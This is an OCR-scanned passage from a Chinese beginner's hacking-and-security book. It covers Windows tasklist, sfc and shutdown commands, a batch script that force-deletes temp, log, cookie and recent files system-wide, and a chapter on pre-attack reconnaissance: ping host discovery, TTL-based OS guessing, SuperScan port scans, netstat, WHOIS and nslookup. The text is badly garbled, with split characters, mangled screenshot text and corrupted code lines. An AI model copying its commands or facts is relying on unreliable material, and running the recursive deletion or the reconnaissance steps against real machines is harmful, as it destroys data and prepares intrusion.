命令 ， 按 Enter 键 ， 即 可 显示 本 机 的 所 有 
进程 ， 在 显示 结果 中 可 以 看 到 映像 名 称 、 


PID、 会 话 名 、 会 话 # 和 内 存 使 用 等 5 部 分 
如 下 图 所 示 。 


rvicor 
1800 Servicas 


[step 图 使 用 Tasklist 命令 可 以 查看 每 个 进程 
提供 的 服务 。 例 如 ， 查 看 本 机 进程 svchost 
.exe 提供 的 服务 ， 在 “命令 提示 符 ” 窗 口中 
输入 Tasklist /svc 命令 ， 按 Enter 键 ， 即 可 显 
示 进 程 svchostexe 提供 的 服务 , 如 下 图 所 示 。 


而 知 理 总; Cwind 和 a x 
Microscft 5] 入 
chast- re 943 BrokerInfrastructure, Deom aunch, Power, 
chost. exe 540 RpcEptllapper，RpcSs 
王 IE 576 LS 
i et 
a 
a 
[Step 图 如果 要 查看 本 地 系统 中 哪些 进程 调用 


了 shell32.dll 文件 ， 用 户 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 Tasklist /m shell32 
.dll, 按 Enter - 即 可 显示 这 些 进程 的 列表 。 


17 


SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


而 管理 员 : C\windows\system32\cmd.exe - OO x 


C:\Users\Administrator>Tasklist /m shel132. dll 


映像 名 称 


PID 模块 


B 540 SHELL32. dll 


vchost. exe 1204 SHELL32. dll 


lsvchost. exe 1376 SHELL32. dll 
svchost. exe 1452 SHELL32. dl1 
svchost. exe 1692 SHELL32. dl1 
svchost. exe 2204 SHELL32. dll 
lsvchost. exe 3164 SHELL32. dll 


lsvchost. exe 3172 shell32.dll 


mprare-usbarbitrator64. ex 4036 SHELL32. dll 


得 绝招 13: SFC 命 令 的 应 用 


SFC 命令 是 Windows 操作 系统 中 使 用 
频率 比较 高 的 命令 ， 主 要 作用 是 扫描 所 有 
受 保护 的 系统 文件 并 完成 修复 工作 。 该 命 
令 的 语法 格式 如 下 。 

SFC"/SCANNOW""/SCANONCE""/ 


SCANBOOT""/REVERT""/PURGECACHE""/ 
CACHESIZE=x" 


其 中 ， 各 个 参数 的 含义 如 下 。 

(1) /SCANNOW: 立即 扫描 所 有 受 保 
护 的 系统 文件 。 

(2) /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 

(3) /SCANBOOT: 每 次 启动 时 扫描 所 

受 保护 的 系统 文件 。 

(4)/REVERT: 将 扫描 返回 到 默认 设置 。 

(5) /PURGECACHE: 清除 文件 缓存 。 

(6) /CACHESIZE=x: 设置 文件 缓存 
去 水 s 

下 面 以 最 常用 的 SFC/SCANNOW 为 例 
进行 讲解 ， 具 体 的 操作 步骤 如 下 。 
ep 图 大 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) (A)” 
菜单 命令 ， 如 下 图 所 示 。 


[step 图 弹出 “命令 提示 符 ” 窗 口 ， 输 入 命令 
sfc/scannow， 按 Enter 键 确认 ， 如 下 图 所 示 。 


画 管理 员 : C\WINDOWS\system32\cmd.exe -5 一 口 X 


Microsoft Windows [版 本 10. 0. 17134. 319] 
(ce) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:NUsers\NAdministrator>sfc/scannow 


开始 自动 扫描 系统 ， 并 显示 扫描 的 进 
度 ， 如 下 图 所 示 。 


而 管理 员 : C\WINDOWS\system32\cmd.exe -5 一 口 x 


Mi crosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator’sfc/scannow 

开始 系统 扫描 。 此 过 程 将 需要 一 些 时 间 。 
始 系统 扫描 的 验证 阶段 。 

Wi 


step 贺 在 扫描 的 过 程 中 ， 如 果 发 现 损坏 的 系 
统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 
复 后 的 信息 ， 如 下 图 所 示 。 


而 S32 WINDOWS\system3Z\ond exe re 


C:VUEersvhdniristratcrysfcfscannow 
开始 系统 扫描 。 此 过 程 将 需要 一 些 时 间 。 
Nt 段 - 

验证 100% 已 完 成 


和 En 2 由 
ey Ee 吉 | 证 人 


CNUsersNadnini stratcr; 


2.3 ”实战 演练 


也 实战 演练 1 一 一 使 用 命令 代码 清除 系统 垃 


使 用 批 处 理 文件 可 以 快速 地 清除 计算 
机 中 的 垃圾 文件 ， 下 面 介绍 使 用 批 处 理 文 
件 清除 系统 垃圾 文件 的 具体 步 又 。 
Estee 加 打开 记事 本 文件 ， 在 其 中 输入 可 以 清 
除 系统 垃圾 的 代码 ， 输 入 的 代码 如 下 : 


Qecho off 

echo 正 在 清除 系统 垃圾 文件 ， 请 稍 等 ...... 

del /f /s /q %systemdrive®%\*.tmp 

del /f /s /q %systemdrives$\*. mp 

del /f /s /q %systemdrive%\*.]log 

del /f /s /q %systemdrive%\*.gid 

del /f /s /q ®%systemdrive®%\*.chk 

del /f /s /q ®%systemdrive®%\*.old 

del /f /s /gq %systemdrives%\ 
recycled\*.* 

del /f /s /q $%windirg\* .bak 

del /f /s /q Swindir%\prefetch\*.* 

rd /s /q %windir%s\temp & md 
%windirg\temp 

del /f /qd %userprofile%\cookies\*.* 

del /f /q %userprofile%\recent\*.* 

del /f /s /qd “%userprofileg\Local 
Settings\Temporary Internet Files\*.*” 

del /f /s /gq “%userprofile$s\Local 
Settings\Temp\*.*” 

del Vt /a VS 
recent\*.*” 

echo 清除 系统 垃圾 完成 ! 


echo. & pause 


将 上 面 的 代码 保存 为 del.bat， 如 下 图 
所 示 。 


司 del - is 事 二 - ao 
文件 (月 编 志 E) 格式 (O) 坦 喜 M| 攻防 |H) 


facho_off 
echo 正在 : 


“%userprofiles%\ 


el/ 仿 从 和 ten 让 且 Nm 
de] 人 /s /qa %systemdriya% Wog 
el /£ /s /q Wsystemlriveh\t. sid 
de] 人 /s /qa %systemdriva%\#, chk 
emdriveh Nt, old 
acycled\#.* 


rd /s /q gwindirgNtemp & nd Wrindiz%\temp 
He] /f /q Wuserprofile%\cookies\*.* 

del /E /q NuserprofileN\recent\t.+ 

de] /? /s /a “userprofile%\Local 
del At /s /q ” fileN\Local Set 
del /i /8 /a file%\recent Vt. * 
echo 请 除 系 统 垃圾 完成 | 


[step 图 在 “命令 提示 符 ” 窗 口中 输入 del.bat 
命令 ， 按 Enter 键 ， 就 可 以 快速 清除 系统 垃 
圾 ， 如 下 图 所 示 。 
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丽 待 至 员 : C\windows\system32\cmd.exe - delbat 一 口 x 
(c) 2017 Microsoft Corporation。 保留 所 有 权利 。 ~ 


:\Users\Administrator>del. bat 
到 C:\Users\Administrator\. bat 


:MUsersNAdministrator>ycd c:\ 


>del, bat 
文件， 请 稍 等 .…... 


实战 演练 2 一 一 使 用 shutdown 命 令 实现 
定时 关机 

使 用 shutdown 命令 可 以 实现 定时 关机 
的 功能 ， 具 体操 作 步 又 如 下 。 
在 “命令 提示 符 ” 窗 口中 输入 
shutdown /s /t 40 命令 ， 如 下 图 所 示 。 


丽 管理 吴 : CNwindows\system32Vcmd,exe 一 口 X 


icrosoft Windows [版 本 10. 0. 16299. 15] 
(c) 2017 Mi crosoft Corporation。 保留 所 有 权利 。 


:\Users\Administrator>shutdown /s /t 40。 


v 


弹出 一 个 即将 注销 用 户 登 录 的 信息 提 
示 框 ， 这 样 计算 机 就 会 在 规定 的 时 间 内 关 
机 ， 如 下 图 所 示 。 


[Bee 图 如果 此 时 想 取消 关机 操作 ， 可 在 命令 
行 中 输入 命令 shutdown /a 后 按 Enter 键 ， 
桌面 右 下 角 出 现 如 下 图 所 示 的 弹 窗 ， 表 示 
取消 成 功 。 


忽 


加 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


2.4 小 试 身 手 


练习 1: 通过 滑动 鼠标 关闭 计算 机 


在 Windows 10 操作 系统 中 ， 用 户 可 以 
通过 滑动 鼠标 以 关闭 计算 机 ， 具 体 的 操作 
步骤 如 下 。 

[se 图 按 Windows+R 组 合 键 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “运行 ”文本 框 中 输入 CN\ 
Windows\System32\ SlideToShutDown.exe， 
单 击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


可 运行 x 


Windows 将 根据 你 所 纺 入 的 名 称 ， 为 你 打开 框 应 的 程序 、 


二。 文人 夹 、 六 或 Internet 资源 


打开 (Q): |C\Windows\System32\lideToShutDown.exe 


[step 图 此 时 显示 如 下 图 所 示 的 界面 ， 使 用 鼠 
标 向 下 滑动 则 可 关闭 计算 机 ， 向 上 滑动 则 
取消 操作 。 如 果 使 用 计算 机 支持 触 屏 操作 ， 
也 可 以 手指 向 下 滑动 进行 关机 操作 。 


浏览 (B).… 


滑动 以 关闭 计算 机 


了 


侈 注意 : 输入 的 命令 中 ， 执 行 C Win- 
dows\System32 文件 夹 下 SlideToShutDown 
exe， 如 果 Windows 10 不 做 C 盘 ， 则 将 C 
修改 为 对 应 的 盘 符 即 可 ， 如 D、E 等 。 另外 ， 
也 可 以 进入 对 应 路 径 下 ， 找 到 SlideToShut- 
Down.exe 应 用 , 将 其 发 送 到 桌面 ,方便 使 用 。 


练习 2: 设置 计算 机 的 锁 屏 界 面 

Windows 10 操作 系统 的 锁 屏 功能 主要 加 
用 于 保护 计算 机 的 隐私 安全 ， 又 可 以 保证 
在 不 关机 的 情况 下 省 电 ， 其 锁 屏 所 用 的 图 
片 被 称 为 锁 屏 界面 。 

设置 锁 屏 界面 的 具体 操作 步骤 如 下 。 
[Sep 国 在 桌面 的 空白 处 右 击 ， 在 弹出 的 快捷 
菜单 中 选择 “个 性 化 ”菜单 命令 ， 打 开 “ 个 
性 化 ”窗口 ， 在 其 中 选择 “ 锁 屏 界面 ”选项 ， 
如 下 图 所 示 。 


[Eee 图 单 去 “背景 ”下 方 “图 片 ” 右 侧 的 下 
拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 可 以 设置 用 
于 锁 屏 的 背景 ， 包 括 图 片 、Windows 聚焦 
和 幻灯 片 放映 3 种 类 型 ， 如 下 图 所 示 。 


+ on 


De 


上 


oD 
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step 图 选择 “Windows 聚焦 ”选项 ， 可 以 在 
“预览 ”区 域 查看 设置 的 锁 屏 图 片 样式 ， 
如 下 图 所 示 。 
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Step 加 同时 按 下 Windows+L 组 合 键 ， 就 可 
以 进入 系统 锁 屏 状态 ， 如 下 图 所 示 。 


al 


第 3 草 ”网 络 踩点 侦察 与 
系统 漏洞 扫描 
黑客 在 入 侵 之 前 ， 都 会 进行 踩点 以 收集 相关 信息 ， 然 后 扫描 系统 的 相关 漏洞 ， 最 后 就 


可 以 利用 相关 攻击 手段 攻击 目标 。 针 对 黑客 入 侵 的 相关 规律 和 过 程 ， 本 章 介绍 网 络 踩点 侦 
察 与 系统 漏洞 扫描 的 相关 知识 ， 主 要 内 容 包括 踩点 与 侦察 范围 、 确 定 扫描 的 范围 以 及 防御 


网 络 侦察 的 对 策 等 。 


3.1 网 络 踩点 侦察 


踩点 ,概括 地 说 就 是 获取 信息 的 过 程 。 
踩点 是 黑客 实施 攻击 之 前 必须 要 做 的 工作 
之 一 ， 踩 点 过 程 中 所 获取 的 目标 信息 也 决 
定 着 攻击 是 否 成 功 。 


忍 绝招 1: 侦察 对 方 是 否 存在 


黑客 在 攻击 之 前 ， 需 要 确定 目标 主机 
是 否 存 在 ， 目 前 确定 目标 主机 是 否 存 在 最 
为 常用 的 方法 就 是 使 用 ping 命令 。ping 命 
令 常 用 于 对 固定 卫 地 址 的 侦察 ， 下 面 就 以 
侦察 某 网 站 的 耳 地 址 为 例 ， 其 具体 的 侦察 
步骤 如 下 。 

[Sep 图 在 Windows 10 系统 界面 中 ， 右 击 “ 开 
始 ” 按钮 ， 在 弹出 的 快捷 菜单 中 选择 “运行 2 
菜单 命令 ， 打 开 “ 运 行 ” 对 话 框 ， 在 “打开 ?” 
文本 框 中 输入 cmd， 如 下 图 所 示 。 


加 运行 x 


珂 Windows 梅 根据 你 所 输入 的 名 称 ， 为 你 打开 框 应 的 程序 、 
文件 卖 、 文 栏 或 Internet 资源 . 


打开 [emd| 
里 便 用 管理 权限 创建 此 任务 


Cm | 到 ja- 
Eee 图 单 去 “确定 ” 按钮 ， 即 可 打开 “ 命 
令 提 示 符 ”窗口 ， 在 其 中 输入 ping www. 
baidu.com 命令 ， 如 下 图 所 示 。 


国 管理 员 : C\windows\system32\cmd.e 一 口 x 


rnt Wndows [版 本 10. 0. 16299. 936] 
(ce) 2017 Wcrosoft Corporation。 保 留 所 有 权利 。 


:NMUsers\VAdministrator>ping www, baidu. com 


[step 图 按 Enter 键 ， 即 可 显示 出 ping 百度 网 
站 的 结果 ， 如 果 ping 通过 了 ， 将 会 显示 该 
IP 地 址 返回 的 byte、time 和 TTL 的 值 ， 说 
明 该 目标 主机 一 定 存在 于 网 络 之 中 ， 这 样 
就 具有 了 进一步 攻击 的 条 件 ， 而 且 time 时 
间 越 短 ， 表 示 响 应 的 时 间 就 越 快 ， 如 下 图 
所 示 。 


而 等 理 & CNwindows\system32Vvcmd eve - 0O x 


Jicrosoit Wndows [版 本 10.0. 16299, 936] 
(c) 2017 Ilicrosoft Corporation。 保 留 所 有 权利 。 


C:\lsers\AdninistratorYping www. baidu. com 
本 Bing wiw. a. shifen com [220. 181. 112, 244] 具有 32 字 节 
220. 181. 112. 2 和 4 的 上 =32 时 间 =90ms TTL=55 
=32 时 全 =8lms TIL=55 


有 220. 181. 112. 244 的 | 
自 220. 181. 112. 244 站 寺 | 站 =79ms TTL=55 来 自 
Oms TTL=55 


220. 181. 112. 244 的 回复 


220. 181. ee En 天 - 0 (0% 壬 失 )， 
和 0 (0 

返 时 |8] (以 对 

本 fo A 平均 = g2ms 


[Estee 加 如 果 ping 不 通过 ， 则 会 出 现 “ 无 法 
访问 目标 主机 ”提示 信息 ， 这 就 表明 对 方 
要 么 不 在 网 络 中 、 要 么 没有 开机 、 要 么 
是 对 方 存 在 ， 但 是 设置 了 ICMP 数据 包 的 
过 滤 等 。 如 下 图 所 示 就 是 ping IP 地 址 为 
192.168.0.100 不 通过 的 结果 。 


丽 SR: C\windows\system32\cmd.exe - DO x 


:NUsersAdministrator>yping 192. 168.0. 100 


| 和 es i 
192. 168. 0. 135 :A i 
自 192, 168.0. 135 的 回复 : a 3 


主机 。 


192. 168. 0. 100 的 Ping 统计 信息 : 
0 


:\Users\Administrator>, 


人 移 注 意 : 在 ping 没有 通过 ， 且 计算 机 又 存 
在 网 络 中 的 情况 下 ， 要 想 攻击 该 目标 主机 ， 
就 比较 容易 被 发 现 ， 达 到 攻击 目的 就 比 
较 难 。 


另外 ， 在 实际 侦察 对 方 是 否 存 在 的 过 
程 中 ， 如 果 是 一 个 全 地 址 一 个 他 地 址 地 侦 
察 ， 将 会 浪费 很 多 精力 和 时 间 ， 那 么 有 什么 
方法 来 解决 这 一 问题 呢 ? 其 实 这 个 问题 不 难 
解决 ， 因 为 目前 网 络 上 存在 多 种 扫描 工具 ， 
这 些 工具 的 功能 非常 强大 ， 除 了 可 以 对 一 个 
人 P 地 址 进行 侦察 ， 还 可 以 对 一 个 他 地 址 范 
围 内 的 主机 进行 侦察 ， 从 而 得 出 目标 主机 是 
否 存 在 、 开 放 的 端口 和 操作 系统 类 型 等 ， 常 
用 的 工具 有 SuperScan、nmap 等 。 

利用 SuperScan 扫描 他 地 址 范围 内 的 
主机 的 操作 步骤 如 下 。 
双击 下 载 的 SuperScan 可 执行 文件 ， 
打开 SuperScan 操作 界面 ， 在 “扫描 ” 选 
项 卡 的 “IP 地 址 ”栏目 中 输入 开始 IP 和 结 
束 IP， 如 下 图 所 示 。 


uperscan ao 二 后 ， 壬 


生 沸 | 主机 和 了 和 要 其 芝 | 把 六 过 而 | 工具 | wiee 枚 | 关于 | 
人 地 址 


| 
Emm | | FT A | | 
| 
| 


EE | 和 MW 有 
rp | wd| 
Mm | 


| ssny | 


上 Re 
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[Se 图 单 去 “扫描 ”按钮 L" |， 即 可 进行 扫描 。 
在 扫描 完毕 之 后 ， 即 可 在 SuperScan 操作 界 
面 中 查看 扫描 到 的 结果 ， 主 要 包括 在 该 卫 
地 址 范围 内 哪些 主机 是 存在 的 ， 非 常 方便 
直观 ， 如 下 图 所 示 。 


思 spescna 三 百 这 


抽 | 主妇 并 设备 | 条 闪 和 项 | 工 呈 ”| Wintevs 要 ss | 关于 | 


主机 如/ 了 | EE EE 尖 轩 


pialn| meme | 
Ta 


Jo013 [oved icg fio le] Jrcp operr0 UDP opom0 |254/254done 


绝招 2: 侦察 对 方 的 操作 系统 


黑客 在 入 侵 菜 台 主机 时 ， 事 先 必须 信息 8 


察 出 该 计算 机 的 操作 系统 类 型 ， 这 样 才能 
根据 需要 采取 相应 的 攻击 手段 ， 以 达到 自 
己 的 攻击 目的 。 常 用 侦察 对 方 操作 系统 的 
方法 为 使 用 ping 命 令 探 知 对 方 的 操作 系统 。 

一 般 情况 下 ， 不 同 的 操作 系统 其 对 应 
的 TIL 返回 值 也 不 相同 ，Windows 操作 系 
统 对 应 的 TTL 值 一 般 为 128; Linux 操作 系 
统 的 TIL 值 一 般 为 64。 因 此 ， 黑 客 在 使 用 
ping 命令 与 目标 主机 相连 接 时 ， 可 以 根据 
不 同 的 TIL 值 来 推测 目标 主机 的 操作 系统 
类 型 ， 一 般 在 128 左右 的 数值 是 Windows 
系列 ，64 左右 的 数值 是 Linux 系列 。 这 是 
因为 不 同 的 操作 系统 的 机 器 对 ICMP 报 文 
的 处 理 与 应 答 也 有 所 不 同 ，TTL 的 值 是 每 
过 一 个 路 由 器 就 会 减 1。 

在 “运行 ”文本 框 中 输入 cmd， 单 击 
“确定 ”按钮 ， 打 开 DOS 窗口 ， 在 其 中 输 
入 ping 192.168.0.135 命令 , 然后 按 Enter 键 ， 
即 可 返回 ping 到 的 数据 信息 ， 
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国 管理 员 : Cwindows\system32\cmd.exe = 站 ”X 了 swetcm40 - DO x 
~ 所 者 。 雪 了 务 提 拓 识 呈 | 拉 报 迁 页 | 工具 “| inaews 术 举 | 关于 | 
[C:\Users\Administrator>ping 192. 168.0. 135 i 5 人 
正在 Ping 192. 168. 0. 135 具有 3 字 节 的 玫 据 : F Ee 
自 192. 168. 0. 135 的 回 这 -3 时 间 <lms TTL=128 
上 192. 168. 0. 135 的 回 : 于 节 -32 [a] < lms TITL=128 六 upP 疝 D 委 扣 om 
192. 168. 0, 135 的 回 时 加 <lms TIL=128 anF 
自 192. 168. 0. 135 的 回复 : 字 节 =32 时 间 <lms TIL=128 肝癌 所 一 ~ te ets + mm 
三 厂 蔷 用 者 坊 交 口 
192. 168. 0. 135 的 Ping 统计 信和 : 3 
数据 包 : 已 发 送 = 4， 已 接收 = 4， 丢 失 = 0 (0% 丢失 )， 可 
eet (以 毫秒 为 单位 ) : 了 二 
= Oms, [4 = Oms, 四 = Oms me ~ 
扬 素 法 口 | a 
C:\Users\Administrator> FE | eno ~ 人 
i 和 所 有 
六 担 A | 
分 析 上 述 操作 代码 结果 ， 可 以 看 到 其 
[Ready 


返回 TTL 值 为 128， 说 明 该 主机 的 操作 系 
统 是 Windows 操作 系统 。 Eee 图 切换 到 “扫描 ”选项 卡 ， 在 其 中 输入 
目标 开始 亿 地 址 和 结束 包 地 址 ， 如 下 图 


温 绝招 3: 确定 可 能 开放 的 端口 服务 所 示 。 


确定 目标 主机 可 能 开放 的 端口 的 方法 es | winaors 核 训 | 关于 | 和 
有 多 种 ， 常 用 的 方法 是 使 用 扫描 工具 ， 如 | ee 


SuperScan 等 ， 还 可 以 使 用 相关 命令 查看 本 ede EE | 
机 开启 的 端口 ， 具 体 的 操作 步骤 如 下 。 sarese 
[step 轩 在 “命令 提示 符 ” 窗 口中 输入 netstat 
-a -nh 命令， 按 Enter 键 ， 即 可 查看 本 机 开启 
的 端口 ， 在 运行 结果 中 可 以 看 到 以 数字 形 
pg TCP 和 UDP 连接 的 端口 号 及 其 状 


态 ， 如 下 图 所 示 。 
» 全 看， 
加 | 管理 员 : CAwindows\system32\emd.exe - OO x | 上风 me 
IEcrosaft Windows [版 本 10. 0. 16299,936] a | le 
(c) 2017 有 Ecrosoft Corporation。 保留 所 有 权利 。 
CNUsersNAdministrator>netstat -a -n 单 击 中 按钮 ， 即 可 开始 扫描 地 址 ， 在 
二 有 扫描 进程 结束 之 后 ，SuperScan 将 提供 一 个 
部 态 
do oor HBHR | ， 主 机 列表 ， 用 于 显示 每 台 扫描 过 的 主机 被 
0. LISTENINS Wy js 入 
0 LISTENIN; 发 现 的 开放 端口 信息 ， 如 下 图 所 示 。 
o. LISTENING 
0. LISTENIN; 
0 LISTENINS [CT oo x 
k 人 | 
0. LISTENIN; 中 地址 
0. LISTENING ES dl EE i 
8 ISR 区 | 
8 SEN ee ] 
0. LISTENIN; Meme | 
0. LISTENING i neers chis Daten 1 
0. LISTENING 至 
0. LISTENIN; 目 
0. LISTENING 十 
0. LISTENINS = 
于 0. LISTENING 
TCP 192. 168- 0. .135: 139 0. LISTENING ~ 
step 贺 启动 SuperScan 程序 然后 切换 到 “ 主 二 


机 和 服务 器 扫描 设置 ”选项 卡 ， 在 其 中 对 
想 要 扫描 的 UDP 和 TCP 端口 进行 设置 ， 如 
下 图 所 示 。 


Am UDPFRO [Wodone 
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[step 园 SuperScan 还 有 选择 以 HTML 格式 显 
示 信 息 的 功能 。 单 击 “ 查 看 HIML 结果 ” 
按钮 ， 即 可 显示 扫描 了 哪些 主机 和 在 每 台 
主机 上 哪些 端口 是 开放 的 ， 并 生成 一 份 
HTML 的 报告 ， 如 下 图 所 示 。 


SuperScan Report - 03/09/19 18:15:22 


137 NETEIOS Name Servce 
pr 

137 WAC daress: 00,15;58:89:87: BL 
METBIOS Name Service yr 


Jethtos one Table (6 manes) 
WHR-AAO4SSIEO0S 00 VWIQUE Rorkstation service Dam 


DRREEDUP 00 GEOUP 
WR-A4045516006 20 WIIQUE Server services sane 
站 


温 绝招 4: 查询 WHOIS 和 DNS 
1. 查询 WHOIS 


一 个 网 站 制作 完毕 后 ， 要 想 发 布 到 互 
联网 上 ， 还 需要 向 有 关机 构 申 请 域名 ， 而 
且 申 请 到 的 域名 信息 将 被 保存 到 域名 管理 
机 构 的 数据 库 中 ， 任 何 用 户 都 可 以 进行 查 
询 ， 这 就 使 黑客 有 机 可 乘 了 。 因 此 ， 踩 点 
流程 中 就 少不了 查询 WHOIS， 常 用 的 查询 
WHOIS 方法 如 下 : 

1) 在 中 国 互联 网 信息 中 心 网 页 上 查询 

中 国 互联 网 信息 中 心 是 非常 权威 域 

名 管理 机 构 ， 在 该 机 构 的 数据 库 中 记录 着 
所 有 以 .cn 为 结尾 的 域名 注册 信息 。 查 询 
WHOIS 的 具体 操作 步骤 如 下 。 
[step 图 在 Microsoft Edge 浏览 器 的 地 址 栏 
中 输入 中 国 互联 网 信息 中 心 的 网 址 http:// 
www.cnnic.net.cn/， 即 可 打开 查询 页 面 ， 如 
下 图 所 示 。 
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互联 网 基础 资源 
Ca 消长 朱 势 基于 三 遇 1 
|= 。 .中国 2 
| 一 | ”~ "注册 服务 机 构 "注册 用 和 机 构 
bet ES CN 。 " 咱 户 Ph 中国 "用户 FA 
E oA: 


[Se 图 在 其 中 的 “查询 ”区 域 的 文本 框 中 
输入 要 查询 的 中 文 域名 ， 如 这 里 输入 “ 淘 
宝 .cn”， 然 后 输入 验证 码 ， 如 下 图 所 示 。 


[0 + TY 


WHOIS 查询 


互 了 网 基础 资源 
Cr 搓 长 掀 势 CN ee” 中 国 二 式 
A ~ HE 机构。 ] 
= |] | 1 CN PP 中国。 请 户 P49 
i | 四 


单 击 “ 查 询 ” 按 钮 ， 打开 “了 验证 码 ” 
对 话 框 ， 在 “验证 码 ”文本 框 中 输入 验证 码 ， 
如 下 图 所 示 。 


4gsd x 


4asqd 


看 不 清 ? 请 点 十 图片 
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step 园 单 击 “确定 ”按钮 ， 即 可 看 到 要 查询 
域名 的 详细 信息 ， 如 下 图 所 示 。 


局 虽 ， 中国 SRR4 一 wos x 十 ~v ~ = 
a | whoisemicc 由 究 在 
淘宝 .cn 的 whois 信 息 
域名 : 淘 袜 .cn 


对 应 punycode 域 名 : xn--8dtz92b.cn 
:淘宝 .cn 


对 应 punycode 域 名 : xn--pbt173b.cn 
ROID: 20040304s54321s00239901-cn 
clier 


ntUpdateprohibited 
注册 者 |D: mark-138412 

注册 者 : Alibaba Group Holdinc Limited 
注册 者 联系 人 邮件 : dnsadmin@hk alibaba-inccom 
所 属 注 册 服 务 机 构 : MarkMonitor Inc. 

域名 服务 器 : ns1.markmonitor.com 

域名 服务 器 : ns3.markmonitorcom 

注册 时 间 : 2003-07-07 20:12:04 

到 期 时 间 : 2019-07-06 20:12:04 

DNSSEC: unsigned 


2) 在 中 国 万 网 网 页 上 查询 
中 国 万 网 是 中 国 最 大 的 域名 和 网 站 托 
管 服务 提供 商 ， 它 提供 .cn 的 域名 注册 信 
息 ， 而 且 还 可 以 查询 .com 等 域名 信息 。 查 
询 WHOIS 的 操作 步骤 如 下 。 
在 Microsoft Edge 浏览 器 的 地 址 栏 
中 输入 万 网 的 网 址 https://wanwang.aliyun. 
com/， 即 可 打开 其 查询 页 面 ， 如 下 图 所 示 。 
| 徊 | CJ 域 各 注册 虚 汶 主机 二 有 x 二 过 
€ > Ey 从 [hts//wonwong.olyun.com 


TE 


大 友 


商标 注册 HOT 域名 交 时 
芋 亿 1 分 钟 旦 交 坛 GE 失主: 
域名 注册 域名 共和 和 到 呈 
Com 二 25 志 497i 
域名 回 购 NEW 域名 优惠 HOT 
VDX69 革 二 圭 SN 


step 贺 在 打开 页 面 的 “域名 ”文本 框 中 输入 
要 查询 的 域名 ， 然 后 单 击 “查询 名 ”按钮 ， 
即 可 看 到 相关 的 域名 信息 ， 如 下 图 所 示 。 
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ER 
你 


= 二 网 计 ~ 二 天 汉 > 志 S 让 汪汪 


2. 查询 DNS 


DNS 即 域名 系统 ， 是 Intemet 的 一 项 核 
心服 务 。 简 单 地 说 ， 利 用 DNS 服务 系统 可 
以 将 互联 网 上 的 域名 与 卫 地 址 进行 域名 解 
析 ， 因 此 ， 计 算 机 只 认识 I 了 P 地 址 ， 不 认识 
域名 。 该 系统 作为 可 以 将 域名 和 了 P 地址 相 
互 转换 的 一 个 分 布 式 数据 库 ， 能 够 帮助 用 
户 更 为 方便 地 访问 互联 网 ， 而 不 用 记 住 被 
机 器 直接 读 取 的 外 地址 。 

目前 ， 查 询 DNS 的 方法 比较 多 ， 常 用 
的 方式 是 使 用 Windows 系统 自 带 的 nslookup 
工具 来 查询 DNS 中 的 各 种 数据 ， 下 面 介 绍 
两 种 使 用 nslookup 查看 DNS 的 方法 。 

1) 使 用 命令 行 方 式 

该 方式 主要 是 用 来 查询 域名 对 方 的 他 
地 址 ， 也 即 查询 DNS 的 记录 ， 通 过 该 记录 
黑客 可 以 查询 该 域名 的 主机 所 存放 的 服务 
器 ， 其 命令 格式 为 nslookup 域名 。 

例如 ， 想 要 查看 www.baidu.com 对 应 
的 他 信息 ， 其 具体 的 操作 步骤 如 下 。 

[step 国 在 “命令 提示 符 ” 窗 口中 输入 nslookup 
wwwbaidu com 命令 ， 如 下 图 所 示 。 


[版 本 10.0. 16299. 936] ~ 
5 


C:\lsers\Administrator>nslookup www. baidu. com 


[step 图 按 Enter 键 ， 即 可 得 到 运行 结果 ， 在 
运行 结果 中 可 以 看 到 “名 称 ” 和 “地 址 ” 
行 分 别 对 应 域名 和 耳 地址， 而 最 后 一 行 显 
示 的 是 目标 域名 并 注 明 别名 ， 如 下 图 所 示 。 


丽 管理 员 : C\windows\system32\cmd.exe 一 口 x 


MMicrosoft Windows [版 本 10. 0. 16299. 936] 
(ce) 2017 Microsoft Corporation。 保 留 所 有 权利 。 


Es ee www. baidu. com 


Address: 61.128.114.166 
起 应 和 答 : 
www. a. shifen. com 
ees 220. 181. 111. 37 


220. 181. 112. 244 


Aliases: www.baidu. com 


C:\Users\Administrator>» 


2) 交互 式 方式 

可 以 使 用 nslookup 的 交互 模式 对 域名 
进行 查询 ， 具 体 的 操作 步骤 如 下 。 
Bstep 加 在 “命令 提示 符 ” 窗 口中 输入 


nslookup 命令 ， 然 后 按 Enter 键 ， 即 可 得 到 
运行 结果 ， 如 下 图 所 示 。 
国 管理 员 : CAwindows\system32\emdexe -.. 一 口 x 


nown 


: \Users nini gtratorYnslookup 
默认 服务 : 
hd 61. 1 114. 166 


dress: 


> 


step 园 在 “命令 提示 符 ” 窗 口中 输入 set 
type=mx 命令 ， 然 后 按 Enter 键 ， 进 入 命令 
运行 状态 ， 如 下 图 所 示 。 

国 关 a 吕 : Cwindows\system32\emdexe -一 口 X 


: \sers\Administratornslookup 
Unknown 
Address: 61. 128. 114. 166 


> set type=mx 
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[step 图 在 “命令 提示 符 ” 窗 口中 输入 想 要 查 
看 的 网 址 (必须 去 掉 www) ， 如 输入 baidu. 
com， 按 Enter 键 ， 即 可 得 到 百度 网 站 的 相 
关 DNS 信息 ， 即 DNS 的 MX 关联 记录 ， 
如 下 图 所 示 。 


国 管理 员 : C\windows\system32\cemd.exe - ns 一 口 x 
:\Users\hdministratornslockup ^ 


: Ungnowm 
ddress: 61. 128. 114. 166 
> set type=mx 
> baidu. 5 


2 114. 166 


NX preference = 20, mail exchanger 
= jpmx. baidu. com 

aidu. com NX preference = 20, 
mx50. baidu. com 

ai du. com MX preference = 10, 
= mx, maillb. baidu. com 

aidu. com NX preference = 15, 
mx. n. shifen. com 

aidu. com JIX preference = 20, 
mxl1. baidu. com 


mil exchanger 
mail exchanger 
mil exchanger 
mil exchanger 


- v 


绝招 5: 侦察 对 方 的 网 络 结构 


找到 适合 攻击 的 目标 后 ， 在 正式 实施 
